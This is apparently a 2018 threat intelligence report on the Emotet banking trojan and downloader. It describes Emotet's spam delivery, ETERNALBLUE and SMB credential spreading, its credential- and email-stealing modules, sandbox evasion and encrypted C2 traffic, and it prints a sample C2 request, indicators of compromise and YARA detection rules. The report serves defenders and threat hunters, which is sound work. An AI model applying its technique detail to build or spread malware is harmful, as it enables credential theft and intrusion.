CURRENT INTELLIGENCE REPORT 

Hunting Emotet  
   
Date of information​ ​11/08/2018 

Distribution​: SHAREABLE - Can be shared with client and prospects 

 
Scope Note: As per the customer request, Recorded Future researched the Emotet downloader 
and banking trojan to assist incident responders and threat hunters with identifying Emotet 
infections. Additionally, this report provides a baseline of victimology to determine targeting 
practices of Emotet operators. Sources include the Recorded Future platform, VirusTotal, 
ReversingLabs, Intezer, and VMRay, along with third-party metadata and common OSINT 
techniques. 
 
Executive Summary 
 
Recorded Future assesses that Emotet is a sophisticated malware, offering operators a 
number of evasion techniques, diverse propagation tactics, and methods to generate 
revenue. 
 
● Recorded Future could not find any correlation in victims either geographically or in 
specific industries. Emotet is likely the most popular method of distribution at this 
time, and intends to spread to as many victims as possible without discretion.  
● Many of Emotet’s modules are more conducive to spreading Emotet to other hosts, 
rather than gathering banking information to make a profit. This indicates that 
Emotet operators could be more interested in selling access to infected hosts or to 
the botnet at large to spread other malware, rather than monetizing the infections 
themselves.  
● Emotet commonly abuses legitimate or native Windows tools to gather information, 
or infect further hosts, in an effort to make its behavior difficult to detect. 
● The new email-stealing module elevates Emotet to a more sophisticated class of 
malware, giving the already stealthy trojan espionage capabilities. A number of 
recent​ samples also abused a common code-signing certificate, signaling increased 
evasion capabilities and the intent to remain undetected.  

 
 

Recorded Future​ ​|​ w

​ ww.recordedfuture.com​ |
​ ​ R
​ FI-2018-1108​ |
​ ​ ​1
 
 
CURRENT INTELLIGENCE REPORT 
 

Threat Analysis 
 
Background  
 
Emotet is an advanced, modular banking trojan that primarily functions as a downloader or 
dropper of other banking trojans. Emotet operators are not selective about targeting a 
specific industry or region and instead spread without discretion. The malware operators 
appear more interested in leveraging large volumes of infection to generate profit.  
 
Emotet (​Intelligence Card​) was originally identified as a new banking trojan in 2014 and is 
often referred to as Geodo. The malware was the product of natural evolution from the 
Feodo (sometimes called Cridex or Bugat) banking trojan, which spawned other offspring. 
In the past 12 months, it evolved from a standalone threat into a distributor of other 
trojans, with ​numerous​ large campaigns taking place over the summer of 2018. The 
malware is unique in that it employs a litany of open source libraries and code, enough to 
title​ a folder in its code directory as “Open S​ource.” A number of Emotet modules 
encorporate utilities developed by Nirsoft to scrape and gather passwords on the victim 
machine. 
 
In the last year, Emotet has been acting as a spam-sending malware, that infects target 
systems to then load other malware families onto the host. The infected hosts that 
distribute spam and occasionally act as proxies for the command and control servers are a 
decentralized network, making it difficult for defenders to block at their perimeter.  
 
Victimology 
 
Recorded Future found no distinct pattern in Emotet targeting, with 22 distinct industries 
being found in victimology of the malware in the last year. Emotet operators have interest 
in selling access to infected hosts or to the botnet at large to spread other malware, rather 
than monetizing the infections themselves. Emotet’s distribution of other malware appears 
to be more targeted geographically, based on the interest of those operators.  
 
Affiliated and Associated Malware 
 
Although Emotet can operate as a standalone banking trojan, its operators often lend its 
spam sending and downloader capabilities to other malware families for distribution. The 
following malware are commonly distributed via Emotet, according to Recorded Future 
data. These trojans are listed in order of their co-occurrences with the Emotet malware 
family.  
 

Recorded Future​ ​|​ w

​ ww.recordedfuture.com​ |
​ ​ R
​ FI-2018-1108​ |
​ ​ ​2
 
 
CURRENT INTELLIGENCE REPORT 
 

 
​ ecorded Future 
Emotet & Associated Malware, via R
 
TrickBot 
 
Emotet has been consistently observed delivering the TrickBot (​Intelligence Card​) banking 
trojan. Considered to be the successor to the infamous Dyre banking trojan (​Intelligence 
Card​), TrickBot leverages multiple attack vectors including redirection attacks and 
webinjects to attempt to steal information from financial institutions and initiate fraudulent 
wire transfers. Operators of the Dyre banking trojan were previously associated with an 
advanced threat campaign dubbed Carbanak that leveraged a variant of malware of the 
same name to steal data from financial institutions. Over the past two years, the only group 
of note that Recorded Future has observed utilizing TrickBot is the group of actors known 
as TA505 (​Intelligence Card​). The group may have collaborated with Emotet operators to 
distribute the banking trojans in tandem, according to reports released in July and August 
2018 from ​Palo Alto​ and ​Cofense​, respectively. Trickbot is continuing to be distributed with 
Emotet, with the latest observation coming on November 6, 2018 by ​Malware Traffic 
Analysis​.  
 
 
Zeus Panda Banker 
 
Panda Banker (​Intelligence Card​), a v​ ariant​ of the Zeus banking trojan (​Intelligence Card​), is 
delivered using Emotet. The attack appears in the form of a malspam phishing campaign 
that uses weaponized Microsoft documents that deploy the payload. Zeus Panda used 
Emotet distribution to ​target​ financial institutions, and video streaming services in Japan. 
Other primary targets were organizations from United States and Canada. 
 

Recorded Future​ ​|​ w

​ ww.recordedfuture.com​ |
​ ​ R
​ FI-2018-1108​ |
​ ​ ​3
 
 
CURRENT INTELLIGENCE REPORT 
 

IcedID  
 
Researchers with IBM's X-Force team have d ​ iscovered​ a new banking trojan, IcedID, which 
they state became first active in September 2017. IcedID (​Intelligence Card​) possesses 
functions similar to those from other well-known and dangerous banking trojans. IcedID 
has been observed targeting diverse entities in or related to the US finance industry, 
including banks, payroll divisions, and payment card providers. The malware has 
additionally targeted mobile service providers, as well as webmail and e-commerce sites. 
IcedID is spread via malicious spam, dropped by the Emotet trojan. An IcedID campaign 
observed in late October 2017 used four C2 servers, two of them in Russia, one in 
Amsterdam, and one in Canada. Combined with the malware's targeting history, we 
suspect that IcedID's operators are located in Europe or North America, but at the time of 
this writing have no other indicators to come to a more specific conclusion. 
 
Qakbot 
 
QakBot, sometimes called BASHLITE or QBot (​Intelligence Card​) is a malware which 
primarily infects Linux systems in order to launch DDOS attacks by creating a botnets of 
Internet of Things devices, according to ​Trend Micro​ reporting. The victims are mostly 
residential users, but also gaming platforms and websites. The majority of the attacks are 
UDP and TCP floods, although HTTP attacks are observed as well. ​The botnet has been 
abused by the Lizard Squad threat actor group (​Intelligence Card​). The malware strain is 
largely considered a precursor to the much more prolific Mirai malware. 
 
Dridex 
 
Dridex ​(I​ ntelligence Card​) w
​ as first observed in July 2014, and a
​ ccording to Flashpoint 
Intelligence​, is considered the successors to GameOver ZeuS. Like other banking trojans, 
Dridex utilizes a peer-to-peer architecture to evade detection or monitoring from law 
enforcement. The trojan was most active between 2014 and 2015, prior to its heavy 
distribution via Emotet in 2018.  
 
AZORult 
 
The AZORult trojan (​Intelligence Card​) is a common banking trojan, that harvests and 
exfiltrates data from the compromised system. The malware is commonly peddled on dark 
web forums, and was previously ​distributed​ by exploit kits or malvertising, but was 
observed​ to be distributed in the Emotet-IcedID campaign in September 2018.  
 
 
 

Recorded Future​ ​|​ w

​ ww.recordedfuture.com​ |
​ ​ R
​ FI-2018-1108​ |
​ ​ ​4
 
 
CURRENT INTELLIGENCE REPORT 
 

Technical Analysis 
 
Emotet is a sophisticated malware, offering operators a number of evasion techniques, as 
well as different methods of spreading, and a large number of capabilities to generate 
revenue for criminal users. This section will look at tools used for delivery and lateral 
movement to infect hosts, then will address modules of interest, followed by an 
assessment of Emotet’s command and control communications. Finally, technical patterns 
of infection and persistence locations will be discussed, so that defenders may be able to 
identify lurking infections.  
 
This technical information comes from Recorded Future behavioural analysis and 
inspection of the samples, along with aggregated analysis from U ​ S CERT​, C
​ ERT Polska​, 
Barkly​, ​Kryptos Logic​, ​CheckPoint​, B
​ romium​, ​Fidelis Security​, and ​Malwarebytes​. 
 
Delivery 
 
Emotet is commonly delivered via malicious spam emails, although it maintains other 
methods to introduce itself to a victim environment. The email can take multiple forms, 
most commonly using an attached Word or Excel document to exploit vulnerabilities in 
Microsoft Office to download Emotet. This includes documents that contain Powershell 
commands, exploiting CVE-2017-11882​ (​Intelligence Card​) ​via poisoned RTF documents, or 
via an embedded link to a malicious URL. Carbon Black​ ​found​ a​ campaign from June 2018 
that sent Word documents that used obfuscated VBScripts that invokes PowerShell 
commands. 
 
The email subjects often center around a requested payment or invoice or a delivery 
notification for tracking shipments. These emails can be sent from spoofed addresses, but 
are often not, relying on volume to generate new infections. The non-use of typosquatted 
domains or email addresses allows Emotet to distance itself from being attached to specific 
infrastructure.  
  
The trojan can​ ​propagate​ ​laterally via the ETERNALBLUE exploit, which abuses SMB version 
1 on an local network to drop and execute further versions of the malware. Additionally, 
Emotet​ ​attempts​ ​to enumerate other hosts on the network, and brute force their domain 
credentials for access. An infected host also becomes a part of the spam botnet that is 
used to spread Emotet via email. 
 

Recorded Future​ ​|​ w

​ ww.recordedfuture.com​ |
​ ​ R
​ FI-2018-1108​ |
​ ​ ​5
 
 
CURRENT INTELLIGENCE REPORT 
 

 
Emotet Infection Chain, via ​Barkly 
 
ETERNALBLUE Propagation 
 
Emotet uses the ETERNALBLUE tool, which is an SMB exploit affecting various Windows 
operating systems from XP to Windows 7, along with deprecated versions of Windows 
servers. The exploit injects shellcode into vulnerable systems, targeting machines by IP 
address and sending the shellcode to the victim over SMB/445, according to a report from 
Fidelis Security​. Emotet abuses this exploit to operate as a worm across a local network, to 
infect more victim hosts. The ETERNALBLUE module sends an SMB Echo request, and crafts 
the exploit for delivery based on the target architecture. ETERNALBLUE then fingerprints 
the host via its SMB response, and drops the backdoor on the host.  
 
Network Password Scraper & SMB Worm Module 
 
Emotet uses a list of basic credentials to bruteforce access to hosts on a local network, 
again over SMB. This is supplemented by use of the NetPass.exe utility, according to ​Fidelis 
Security​, which is used to gather all passwords associated with the current user, including 
those from network drives. Those credentials are then used to attempt to remotely login to 
other hosts. If those connections fail, the module attempts to find writable share drives via 
SMB that it can then use an infection vectors into hosts that have access to that shared 
drive.  
 

Recorded Future​ ​|​ w

​ ww.recordedfuture.com​ |
​ ​ R
​ FI-2018-1108​ |
​ ​ ​6
 
 
CURRENT INTELLIGENCE REPORT 
 

Capabilities & Modules 

 
Anti-Analysis and Evasion 
 
Emotet uses checks to determine if it is being run in a sandboxed environment and will not 
function if the environment meets parameters of a typical sandbox. This includes a period 
where the malware will not run, and Emotet will suspend its operations if it detects 
monitoring from a virtual machines.  
 
Similarly to the continuous evolution of Emotet command and control servers, the malware 
is polymorphic and m ​ utates​ with each infection to change hash data. This allows Emotet to 
largely avoid signature-based antivirus detections. This is done by the code changing upon 
every execution of the malware, while maintaining its core functionality. Additionally, once 
the main Emotet module is loaded, the malware attempts to update itself to the latest 
version, to avoid static AV detection.  
 
On August 1, 2018, researchers at K ​ ryptos Logic​ found that a number of Emotet trojan 
loader samples are signed by a common code signing certificate. This certificate has since 
been revoked, but the trend of Emotet operators abusing pseudo-legitimate code signing 
certificates to bypass security controls will likely continue. 
 
● Thumbprint: 919368A0286FDAD494A16388C83A571E6B9C285A 
● Serial number: 38 6B C7 CB 6D B4 03 1A 6C DC 2D 67 07 13 B6 1A 
 
Crypter 
 
Emotet is packed, or put into a compressed format, as a method to obfuscate its code and 
evade detection. This effort utilizes a crypter to protect itself from detection and make 
reverse engineering efforts more complicated. Thus, much of the observed code from 
when the sample is packed is built to unpack the sample upon execution. Recorded Future 
could not identify the crypter or packer used to compress Emotet at the time of analysis.  
 
Main Module - Malware Dropper 
 
The module that makes up the base Emotet payload provides the initial backdoor into a 
victim system. Emotet communicates the victim system data to its command and control, 
with data including username, operating system version, and a list of running processes. 
The list of command and control IP’s is hardcoded into each sample of malware, which are 
called upon to download the other modules. This module is also used to download the 
other malware families previously described.  
 

Recorded Future​ ​|​ w

​ ww.recordedfuture.com​ |
​ ​ R
​ FI-2018-1108​ |
​ ​ ​7
 
 
CURRENT INTELLIGENCE REPORT 
 

These additional modules are downloaded as obfuscated DLL’s, using a XOR cipher to hide 
incriminating strings as the module is downloaded or scanned. Often, the modules are 
based off of open source tools to scrape data from the victim’s machine, including email 
data, passwords used in web browsing, and credentials used on the host for other 
activities. These modules generally seem more interested in spreading Emotet to further 
hosts, than gathering banking information to make a profit. This indicates that Emotet 
operators have interest in selling access to infected hosts or to the botnet at large to 
spread other malware, rather than monetizing the infections themselves.  
 
Email Stealing Module 
 
On October 31, 2018, researchers from Kryptos Logic found that the Emotet downloader 
and banking trojan now has the ability to exfiltrate emails from victim systems. This is an 
evolution of Emotet’s abuse of the Outlook Messaging API, which was used to pilfer lists of 
the victim’s contacts. The module, contained in mapi32.dll, accesses 
HKLM\Software\Clients\Mail\Microsoft Outlook. The only observed sample of this module 
has an MD5 hash value of 6cd44f2d00b43d80c08922d99d51cce804a59a54.  

 
Emotet Email Harvesting Mechanism, via ​Kryptos Logic 
 

Recorded Future​ ​|​ w

​ ww.recordedfuture.com​ |
​ ​ R
​ FI-2018-1108​ |
​ ​ ​8
 
 
CURRENT INTELLIGENCE REPORT 
 

 
The upgraded malware accesses the Outlook registry key to scrape email addresses, email 
subjects, and the contents of the email from the interpersonal message (IPM) root folder. 
This data is then written to a temporary file and encoded into Base64. This information is 
then exfiltrated to the Emotet C2 via HTTP on an API call from the WinINet API.  
 
Emotet abuses the Nirsoft Mail PassView, a pseudo-legitimate utility which identify email 
addresses, passwords and contact lists from common email clients, including Outlook, but 
also Gmail, Hotmail and Thunderbird. This is still used to scrape email clients other than 
Outlook, to supplement their spam sending capability.  
 
Spam Module 
 
The spam sending module of Emotet relies on the email stealing and harvesting modules 
to create lists of further targets for sending spam. The module pulls in local data to 
supplement data sent from the command and control that includes the message template, 
subject line, a list of recipients, and list of hijacked accounts, which are used for the spam 
distribution. The spam is not sent directly from the local host, but from a repository of 
previously scraped email accounts that are remotely logged into to send the spam emails. 
 
Browser Password Stealer & Banking Module 
 
Emotet has used WebBrowserPassView, another password recovery tool made by Nirsoft, 
that captures passwords stored by Chrome, Internet Explorer, Firefox, Safari, and Opera. 
These target a variety of services for data mining, including bank account and email 
information, but also social media and other common login data. This module contains 
similar functions to the Graftor browser password stealer (​Intelligence Card​), which also 
abuses WebBrowserPassView.  
 

Recorded Future​ ​|​ w

​ ww.recordedfuture.com​ |
​ ​ R
​ FI-2018-1108​ |
​ ​ ​9
 
 
CURRENT INTELLIGENCE REPORT 
 

 
Example of WebBrowserPassView, via C
​ heckPoint 
 
Previous samples of Emotet ​invoked​ a banking module, which intercepts network traffic 
from the browser to steal banking details entered by the user, used in combination with 
the stolen browser passwords. This module operated as a man-in-the-browser attack, 
sniffing network activity to scrape passwords related to banking activity. CERT Polska found 
this module was occasionally used to automatically steal funds from victimized bank 
accounts using Automated Transfer Systems (ATS).  
 
 
Module  File Name  File Hash 

Email Stealer  mapi32.dll  1be50fc25a29f09cf47ed6e00311b487f6f0d187db

473b2bf29cd94d58ffa38e (​Intelligence Card​) 

Email Harvester  email_address_harvester.dll  d4491f9b885bba06d7ee6e02e6e71272893638bb

b92f2c23b9ddf52f8a26a702 (​Intelligence Card​) 

Spam Module  spam.dll  d7efad30d0a56983fba15f0be28877bd7d55c7233

88005baa322b94c02540f11 (​Intelligence Card​) 

Browser Credential  web_browser_credential_ste 86cf916c547b6f228b8e7bd4667715db0467c3d14

Stealer  aler.dll  1f6226e27025797aeca10ec (​Intelligence Card​) 

Connection Verifier  connection_verifier.dll  022a5dfe18ee332c020a245cac64f4aa4fc5dd528f 

79923d00d8ffe376fc76da (​Intelligence Card​) 

 
 
 

Recorded Future​ ​|​ w

​ ww.recordedfuture.com​ |
​ ​ R
​ FI-2018-1108​ |
​ ​ ​ 10
 
 
CURRENT INTELLIGENCE REPORT 
 

Command and Control Communications 

 
Emotet consistently cycles through its command and control infrastructure, making it 
difficult to block or detect based on network traffic. Oddly, command and control IPs are 
generally hardcoded into the main Emotet dropper module, as is the command and control 
public RSA key. This may indicate it is easier for operators to upload or update the trojan 
software to cycle out IP addresses, than to rely on DNS names via domain generating 
algorithm (DGA). It is unclear if this is the case.  
 
Similar to other aspects of the trojan, Emotet abuses a third party service to fabricate its 
command and control communications; in this case, Google’s Protocol Buffers (Protobuf) 
was used to build its C2 architecture. The trojan also built its encryption over OpenSSL, 
leading to CheckPoint researchers to call it “over-engineered.” C ​ heckPoint​, discussing C2 
connections, further stated: 
 
Communication is encrypted with a randomly-generated AES key, which is encrypted 
using the server public key and appended to the message. This protocol is unusually 
cryptographically sound and even a person with full access to the malware sample and a 
traffic log will be unable to recover the original communication, unless the original 
process that spawned the AES key is still running. 
 
Communication to the download sites for the main payload or additional modules occurs 
over normal HTTP protocols; however, without making a prior DNS query to the download 
site. Using a GET request, victim data is sent in the Cookie header of the HTTP request, 
seen below. The cookie’s key is random 16-bit hexadecimal number, with Base64-encoded 
binary blob as value. 
 
GET / HTTP/1.1 
Cookie: 
DD29=e8fd7YpIy2Ui+U7bz1/cQD9bH4KHshzaN2SpKoPEnC1D85K4Zrwdb6dBoHoDC5GgvcgecLN20kpk1lQxus
6AJEiutWK4hBSWFbQUmtyr3LxI+/3MFdKn1lo7nWyEw+sCzKL6y34njzJwoDwd3I5BJD0NqUL+iEnbB1EWXQhxcX
ihFeFS+TlRsuMxOl3Xmyo2p0FuHX+hyGoO19dzLpEMK1LhXGkCkha+kPGFqfxECUoQndFLiMRgXAj4Omw/Ywc6
Ba+9d5fyZNLEKbtkxsfO3KmQSLoE4TkITRri1kSMCqnNlb7PTroCQmoJvRHBiEGla6VzgmCQ5tsspBIuaWc2ct9hX
9c4SLZbTnW6mPjLIh4VeDJ7gNpwhedyLHcnr3GWjILLwFPk7RmgHglXXI2qEOXcwbRhtaNuI8RrkMQj37Rov147w
EGBtt+GlQR9/9oFXoBXH9f6m5K4ULP3CEnDGGJVEtfkgt7yZ082wAIfVzow1szvMF4bF7MFaCPbHA9hygyf9Uc8G
wDjM4CndFxUwROWmEgQKjIk24PIj5Y+oz4jF 
User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; SLCC1; .NET CLR 1.1.4322) 
Host: 206.214.220.79:8080 
Connection: Keep-Alive 
Cache-Control: no-cache 

 
The data in the cookie header is constructed using Google’s Protobuf, which includes the 
encrypted RSA key for the command and control, followed by a hash of the data being sent, 
then followed by the encrypted data itself. Unfortunately, this elaborate encryption schema 

Recorded Future​ ​|​ w

​ ww.recordedfuture.com​ |
​ ​ R
​ FI-2018-1108​ |
​ ​ ​ 11
 
 
CURRENT INTELLIGENCE REPORT 
 

and message structure make it difficult to detect network traffic of Emotet infections. If 
able, Recorded Future recommends monitoring for HTTP traffic that does not involve a 
domain name, or referrer, and can filter those by large cookie headers to potentially 
determine a victim in their environment.   
 
However, despite Emotet’s intensive and clandestine communications, the use of the 
ETERNALBLUE exploit may aid defenders in identifying infected hosts if they begin 
exhibiting behavior to enumerate other hosts or sending SMB echo requests to other hosts 
on the NAT. This method of detection may well provide a better early warning for 
defenders, as later network activity does its best to not stand out in network traffic logs.  
 
Persistence Locations 
 
File Locations 
 
Emotet t​ ypically​ drops files into the ​AppData\Local​ or A​ ppData\Roaming​ directories. These 
files are also either randomly named or disguised with names mimicking media 
executables, such as w ​ mplayer.exe​. Emotet attempts to gain administrative privileges in the 
Windows system root directories, allowing the malware to run in disguise as a Windows 
service. Researchers from TrendMicro note that Emotet drops its files into 
AppDataLocal\Microsoft\Windows​ or A ​ ppData\Roaming​ if the trojan gains administrative 
privileges, and into the S ​ ystem​ folder if it cannot escalate privileges.  
 
Examples of the dropped file paths:  
 
 
C:\Users\<username>\AppData\Local\Microsoft\Windows\shedaudio.exe 
 
C:\Users\<username>\AppData\Roaming\Macromedia\Flash 
Player\macromedia\bin\flashplayer.exe 

 
The faked services often use the descriptions of the real services the mimic; however, 
Emotet has yet to list provide a publisher. The lack of publisher, and odd timestamps may 
assist operators in identifying Emotet-created services. Operators can identify created 
services via Windows event logs, searching for event ID 7045. 
 
   

Recorded Future​ ​|​ w

​ ww.recordedfuture.com​ |
​ ​ R
​ FI-2018-1108​ |
​ ​ ​ 12
 
 
CURRENT INTELLIGENCE REPORT 
 

In behavioural analysis of recent samples of Emotet, Recorded Future found the following 
directories were created: 
 
 
directory_created: [ 
C:\Users\<username>\AppData\Local\Microsoft\Windows\Caches 
] 

 
 
Registry Modifications 
 
Emotet creates a registry key to gain persistence on the victim host, which allows the 
malware to be executed upon startup. Recen​tly, these keys have been placed in the folder 
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\​, while a subkey is 
generated if the malware has gained administrative access. The subkey is typically located 
in H
​ KLM\SYSTEM\ControlSet001\services\​. Defenders can assess the maliciousness of any files 
that are configured to execute upon startup, with a time-based analysis, and looking for 
anomalies or files that stand out. Registry modifications can be tracked in Windows event 
logs under event ID 4657.  
  
Further examples of registry keys created by Emotet: 
 
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run 
 
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Run 
 
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run 

 
Scheduled Tasks 
  
While Emotet does not currently use scheduled tasks to achieve persistence on the host, 
many of the malware it drops (Trickbot, Dridex, etc.) do use it as a persistence method. 
Identifying these infections may lead to discovery of an Emotet infection.  
 
Operators can hunt for newly scheduled tasks in Windows event logs for instances of event 
ID 4698. Alternatively, the tools Autoruns and Task Scheduler can also be used on each 
host that is being inspected.  
 
Behavioural Analysis 
 

Recorded Future​ ​|​ w

​ ww.recordedfuture.com​ |
​ ​ R
​ FI-2018-1108​ |
​ ​ ​ 13
 
 
CURRENT INTELLIGENCE REPORT 
 

In behavioural analysis of recent samples of Emotet Recorded Future found the following 
registry keys were created: 
 
HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows Media Player 
NSS\\3.0\\Events\\{083EFA34-5B9E-4BD6-8696-ED706D80114F}\\{3695FB67-53B6-4D5C-B45C-1D6
BB3C3C485}\\Reason 
 
HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet 
Settings\\Wpad\\52-54-00-26-ad-7a\\WpadDetectedUrl 
 
HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Action 
Center\\Checks\\{945a8954-c147-4acd-923f-40c45405a658}.check.42\\CheckSetting 
 
HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet 
Settings\\Wpad\\52-54-00-26-ad-7a\\WpadDecisionTime 
 
HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows Media Player 
NSS\\3.0\\Events\\{767B37BD-21F1-4A4C-BE06-6D89DB7CCABE}\\{3695FB67-53B6-4D5C-B45C-1D
6BB3C3C485}\\Scope 
 
HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows Media Player 
NSS\\3.0\\Events\\{083EFA34-5B9E-4BD6-8696-ED706D80114F}\\{3695FB67-53B6-4D5C-B45C-1D6
BB3C3C485}\\ID 
 
HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows Media Player 
NSS\\3.0\\Events\\{767B37BD-21F1-4A4C-BE06-6D89DB7CCABE}\\{3695FB67-53B6-4D5C-B45C-1D
6BB3C3C485}\\Reason 
 
HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet 
Settings\\Wpad\\{02B68A4B-B854-4981-A220-4267CF5CCD65}\\WpadNetworkName 
 
HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet 
Settings\\Wpad\\{02B68A4B-B854-4981-A220-4267CF5CCD65}\\WpadDecisionTime 
 
HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet 
Settings\\Wpad\\{02B68A4B-B854-4981-A220-4267CF5CCD65}\\WpadDecisionReason 
 
HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows Media Player 
NSS\\3.0\\Events\\{767B37BD-21F1-4A4C-BE06-6D89DB7CCABE}\\{3695FB67-53B6-4D5C-B45C-1D
6BB3C3C485}\\ID 
 
HKEY_CURRENT_USER\\Local Settings\\MuiCache\\33\\52C64B7E\\LanguageList 
 
HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows Media Player 
NSS\\3.0\\Events\\{767B37BD-21F1-4A4C-BE06-6D89DB7CCABE}\\{3695FB67-53B6-4D5C-B45C-1D
6BB3C3C485}\\Data 
 
HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows Media Player 
NSS\\3.0\\Events\\{083EFA34-5B9E-4BD6-8696-ED706D80114F}\\{3695FB67-53B6-4D5C-B45C-1D6
BB3C3C485}\\Scope 

Recorded Future​ ​|​ w

​ ww.recordedfuture.com​ |
​ ​ R
​ FI-2018-1108​ |
​ ​ ​ 14
 
 
CURRENT INTELLIGENCE REPORT 
 

 
HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet 
Settings\\Wpad\\52-54-00-26-ad-7a\\WpadDecision 
 
HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows Media Player 
NSS\\3.0\\Events\\{083EFA34-5B9E-4BD6-8696-ED706D80114F}\\{3695FB67-53B6-4D5C-B45C-1D6
BB3C3C485}\\Data 
 
HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet 
Settings\\Wpad\\{02B68A4B-B854-4981-A220-4267CF5CCD65}\\WpadDecision 
 
HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet 
Settings\\Wpad\\52-54-00-26-ad-7a\\WpadDecisionReason 
 
HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Services 
 
HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run 

 
The same samples deleted the following registry keys: 
 
HKEY_CURRENT_USER\\System\\CurrentControlSet\\Control\\Network\\ShowWirelessConnecting
OnStart 
 
HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet 
Settings\\Wpad\\52-54-00-26-ad-7a\\WpadDetectedUrl 
 
HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet 
Settings\\Wpad\\{02B68A4B-B854-4981-A220-4267CF5CCD65}\\WpadDetectedUrl 
 
 
Additional directories, commands and mutexes: 
 
command_line: [ 
C:\Windows\SysWOW64\nlawatch.exe 
\C:\Program Files\Windows Media Player\wmpnscfg.exe\ 
] 
 
mutex: [ 
Global\\MEC7B5BB7 
Global\\IEC7B5BB7 
] 
 
directory_created: [ 
C:\Users\<username>\AppData\Local\Microsoft\Windows\Caches 
] 

Recorded Future​ ​|​ w

​ ww.recordedfuture.com​ |
​ ​ R
​ FI-2018-1108​ |
​ ​ ​ 15
 
 
CURRENT INTELLIGENCE REPORT 
 

Remediation & Detection 

 
Identify Emotet-created Services, Registry Modifications, or Scheduled Tasks 
 
● Operators can identify created services via Windows event logs, searching for event 
ID 7045, looking for services that do not list a publisher or have odd timestamps. 
 
● Defenders can track registry modifications by looking for Windows event ID 4657 
host logs. 
 
● Operators can hunt for newly scheduled tasks in Windows event logs for instances 
of event ID 4698. Alternatively, the tools Autoruns and Task Scheduler can also be 
used on each host that is being inspected.  
 
Identify Emotet via Network or Host Based Detections 
 
● Using the YARA rules found in Appendix A, defenders can scan inbound emails or 
endpoint devices for signs of files that match signatures typically used by Emotet. 
This includes some of the malicious spam documents, and Emotet modules. These 
YARA rules were derived from public YARA repositories, credited to their authors in 
the meta field of the each rule.  
 
● Using the Snort signatures found in Appendix B, defenders can potentially identify 
hosts that are attempting ​whoami l​ ookups from Emotet, or similar traffic from the 
co-distributed IcedID banking trojan. These SNORT signatures were ​developed​ by 
Lenny Hansson via seclists.com.  
 
Monitor for Emotet Spreading or C2 Communication  
 
● Monitoring for use of SMB and TCP port 445, defenders can identify the use of the 
ETERNALBLUE exploit. This may help detect infected hosts that attempt to 
enumerate other hosts or send SMB echo requests to other hosts on the NAT. 
 
● Defenders can block IPs uploaded to Feodo Tracker. The Feodo Tracker is an open 
source feed that tracks command and control infrastructure used by variants and 
descendants of the Feodo banking trojan, including Emotet and Dridex. This list is 
not all encompassing but can provide potential live C2 infrastructure for monitoring, 
hunting or blocking. This feed can be accessed in Recorded Future as a source, as 
seen in this q
​ uery​.  
 

Recorded Future​ ​|​ w

​ ww.recordedfuture.com​ |
​ ​ R
​ FI-2018-1108​ |
​ ​ ​ 16
 
 
CURRENT INTELLIGENCE REPORT 
 

 
Outlook 
 
Recorded Future assesses ​Emotet is an advanced, modular banking trojan that primarily 
functions as a downloader or dropper of other banking trojans. E ​ motet commonly abuses 
legitimate or native Windows tools to gather information, ​incorporating utilities developed 
by Nirsoft​, in an effort to make its behavior difficult to detect.  
 
Emotet has recently been acting as a spam sending malware, that infects target systems to 
then load other malware families onto the host. E ​ motet operators are not selective about 
targeting a specific industry or region, instead spreading without discretion. The malware 
operators appear more interested in spawning further Emotet infections in large volumes, 
rather than monetizing their current victims, to generate profit. T ​ he infected hosts that 
distribute spam and occasionally act as proxies for the command and control servers are a 
decentralized network, making it difficult for defenders to block at their perimeter.  
 
 
 
 
 
 
   

Recorded Future​ ​|​ w

​ ww.recordedfuture.com​ |
​ ​ R
​ FI-2018-1108​ |
​ ​ ​ 17
 
 
CURRENT INTELLIGENCE REPORT 
 

Appendix A: YARA Rules  

import "pe" 
 
rule Emotet_Certificate { 
meta: 
description = "Detects a compromised certificate abused by Emotet" 
Author = "Insikt Group, Recorded Future" 
date = "2018-11-01" 
hash = "919368A0286FDAD494A16388C83A571E6B9C285A" 
condition: 
uint16(0) == 0x5a4d and 
for any i in (0 .. pe.number_of_signatures) : ( 
pe.signatures[i].issuer contains "thawte SHA256 Code Signing CA" and 
pe.signatures[i].serial == "38:6B:C7:CB:6D:B4:03:1A:6C:DC:2D:67:07:13:B6:1A" 
) 
} 
__________________________________________ 
 
rule Emotet 
{ 
meta: 
author = "kevoreilly" 
description = "Emotet Payload" 
cape_type = "Emotet Payload" 
strings: 
$snippet1 = {FF 15 ?? ?? ?? ?? 83 C4 0C 68 40 00 00 F0 6A 18} 
$snippet2 = {6A 13 68 01 00 01 00 FF 15 ?? ?? ?? ?? 85 C0} 
